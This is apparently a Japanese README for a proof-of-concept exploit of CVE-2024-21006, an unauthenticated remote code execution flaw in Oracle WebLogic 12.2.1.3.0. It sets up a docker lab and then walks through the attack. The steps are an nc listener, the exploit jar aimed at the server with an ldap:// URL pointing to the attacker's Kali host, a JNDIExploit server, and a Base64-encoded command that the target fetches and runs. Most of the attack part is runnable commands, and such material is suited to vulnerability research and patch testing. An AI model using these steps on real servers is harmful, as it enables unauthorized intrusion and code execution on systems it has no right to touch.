
リモートコード実行 (RCE) - Oracle WebLogic 12.2.1.3.0
CVE-2024-21006 は、Oracle WebLogic Server に影響を与える重大なリモートコード実行 (RCE) 脆弱性です。この欠陥は、IIOP (Internet Inter-ORB Protocol) および JNDI (Java Naming and Directory Interface) プロトコルの安全でない使用に関連しており、認証されていないリモート攻撃者が、悪意のある JNDI 参照を介して影響を受けるサーバー上で任意のコードを実行できるようにします。
環境を構築:
docker-compose up -d
Kali のシェルにアクセス:
docker exec -it cve-2024-21006_poc-kali-1 /bin/bash
WebLogic のシェルにアクセス:
docker exec -it cve-2024-21006_poc-weblogic-1 /bin/bash
ExploitBox のシェルにアクセス:
docker exec -it exploitbox /bin/bash
この段階では、ローカルで実行されている WebLogic 12.2.1.3.0 のインスタンスがあります: http://127.0.0.1:7001/console/login/LoginForm.jsp

Kali 上で:
nc -vnlp 1389
ExploitBox 上で:
java -jar CVE-2024-21006.jar <WebLogic の IP> 7001 ldap://<Kali の IP>:1389
Kali が WebLogic からの接続を受信したことを確認:

Kali 上で、JNDIExploit を起動:
cd /exploit
java \
--add-exports java.xml/com.sun.org.apache.xalan.internal.xsltc.runtime=ALL-UNNAMED \
--add-exports java.xml/com.sun.org.apache.xalan.internal.xsltc.trax=ALL-UNNAMED \
--add-exports java.xml/com.sun.org.apache.xalan.internal.xsltc=ALL-UNNAMED \
--add-exports java.xml/com.sun.org.apache.xml.internal.serializer=ALL-UNNAMED \
-jar JNDIExploit/JNDIExploit-1.3-SNAPSHOT.jar -i <Kali の IP>

ExploitBox 上で、exploit を実行:
java -jar CVE-2024-21006.jar <WebLogic の IP> 7001 "ldap://<Kali の IP>:1389/Basic/Command/Base64/<Base64 エンコードされたコマンド>"

Kali 上で、リクエストを受信したことを確認:

WebLogic 上で、コマンドが実行され、ファイルが正常に作成されたことを確認:
